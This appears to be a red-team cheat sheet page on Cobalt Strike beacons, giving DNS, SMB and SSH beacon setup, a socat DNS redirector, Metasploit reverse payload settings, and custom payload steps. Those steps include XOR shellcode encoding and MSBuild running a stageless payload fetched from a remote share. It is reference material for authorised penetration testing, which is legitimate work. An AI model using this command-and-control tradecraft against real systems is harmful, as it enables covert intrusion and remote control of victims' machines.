daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

cobalt-strike-beacons.md (4703B)


      1 ---
      2 title: "Cobalt Strike - Beacons"
      3 section: "Command & Control"
      4 sectionSlug: "command-control"
      5 sourcePath: "docs/command-control/cobalt-strike-beacons.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/command-control/cobalt-strike-beacons.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Cobalt Strike - Beacons
     12 
     13 ## DNS Beacon
     14 
     15 ### DNS Configuration
     16 
     17 * Edit the `Zone File` for the domain
     18 * Create an `A record` for Cobalt Strike system
     19 * Create an `NS record` that points to FQDN of your Cobalt Strike system
     20 
     21 Your Cobalt Strike team server system must be authoritative for the domains you specify. Create a `DNS A` record and point it to your Cobalt Strike team server. Use `DNS NS` records to delegate several domains or sub-domains to your Cobalt Strike team server's `A` record.
     22 
     23 Example of DNS on Digital Ocean:
     24 
     25 ```powershell
     26 NS  example.com                     directs to 10.10.10.10.            86400
     27 NS  polling.campaigns.example.com   directs to campaigns.example.com. 3600
     28 A campaigns.example.com           directs to 10.10.10.10             3600 
     29 ```
     30 
     31 After creating a DNS listener (`Beacon DNS`), verify that your domains resolve to `0.0.0.0`
     32 
     33 * `nslookup jibberish.beacon polling.campaigns.domain.com`
     34 * `nslookup jibberish.beacon campaigns.domain.com`
     35 
     36 If you have trouble with DNS, you can restart the `systemd` service and force Google DNS nameservers.
     37 
     38 ```powershell
     39 systemctl disable systemd-resolved
     40 systemctl stop systemd-resolved
     41 rm /etc/resolv.conf
     42 echo "nameserver 8.8.8.8" >  /etc/resolv.conf
     43 echo "nameserver 8.8.4.4" >>  /etc/resolv.conf
     44 ```
     45 
     46 ### DNS Redirector
     47 
     48 ```ps1
     49 socat -T 1 udp4-listen:53,fork udp4:teamserver.example.net:53
     50 ```
     51 
     52 Debug the DNS queries with `tcpdump -l -n -s 5655 -i eth0  udp port 53`.
     53 
     54 ### DNS Mode
     55 
     56 | Mode           | Description                           |
     57 | -------------- | ------------------------------------- |
     58 | `mode dns-txt` | DNS TXT record data channel (default) |
     59 | `mode dns`     | DNS A record data channel             |
     60 | `mode dns6`    | DNS AAAA record channel               |
     61 
     62 ## SMB Beacon
     63 
     64 ```powershell
     65 link [host] [pipename]
     66 connect [host] [port]
     67 unlink [host] [PID]
     68 jump [exec] [host] [pipe]
     69 ```
     70 
     71 SMB Beacon uses Named Pipes. You might encounter these error code while running it.
     72 
     73 | Error Code | Meaning          | Description                                                                                 |
     74 | ---------- | ---------------- | ------------------------------------------------------------------------------------------- |
     75 | 2          | File Not Found   | There is no beacon for you to link to                                                       |
     76 | 5          | Access is denied | Invalid credentials or you don't have permission                                            |
     77 | 53         | Bad Netpath      | You have no trust relationship with the target system. It may or may not be a beacon there. |
     78 
     79 ## SSH Beacon
     80 
     81 ```powershell
     82 # deploy a beacon
     83 beacon> help ssh
     84 Use: ssh [target:port] [user] [pass]
     85 Spawn an SSH client and attempt to login to the specified target
     86 
     87 beacon> help ssh-key
     88 Use: ssh [target:port] [user] [/path/to/key.pem]
     89 Spawn an SSH client and attempt to login to the specified target
     90 
     91 # beacon's commands
     92 upload                    Upload a file
     93 download                  Download a file
     94 socks                     Start SOCKS4a server to relay traffic
     95 sudo                      Run a command via sudo
     96 rportfwd                  Setup a reverse port forward
     97 shell                     Execute a command via the shell
     98 ```
     99 
    100 ## Metasploit compatibility
    101 
    102 * Payload: `windows/meterpreter/reverse_http or windows/meterpreter/reverse_https`
    103 * Set `LHOST` and `LPORT` to the beacon
    104 * Set `DisablePayloadHandler` to `True`
    105 * Set `PrependMigrate` to `True`
    106 * `exploit -j`
    107 
    108 ## Custom Payloads
    109 
    110 ```powershell
    111 * Attacks > Packages > Payload Generator 
    112 * Attacks > Packages > Scripted Web Delivery (S)
    113 $ python2 ./shellcode_encoder.py -cpp -cs -py payload.bin MySecretPassword xor
    114 $ C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Temp\dns_raw_stageless_x64.xml
    115 $ %windir%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe \\10.10.10.10\Shared\dns_raw_stageless_x86.xml
    116 ```
    117 
    118 ## References
    119 
    120 * [Cobalt Strike > User Guide > DNS Beacon](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/listener-infrastructue_beacon-dns.htm)
    121 * [Simple DNS Redirectors for Cobalt Strike - Thursday 11 March, 2021](https://www.cobaltstrike.com/blog/simple-dns-redirectors-for-cobalt-strike)
    122 * [CobaltStrike DNS Beacon Lab Setup - rioasmara - March 18, 2023](https://rioasmara.com/2023/03/18/cobaltstrike-dns-beacon-lab-setup/)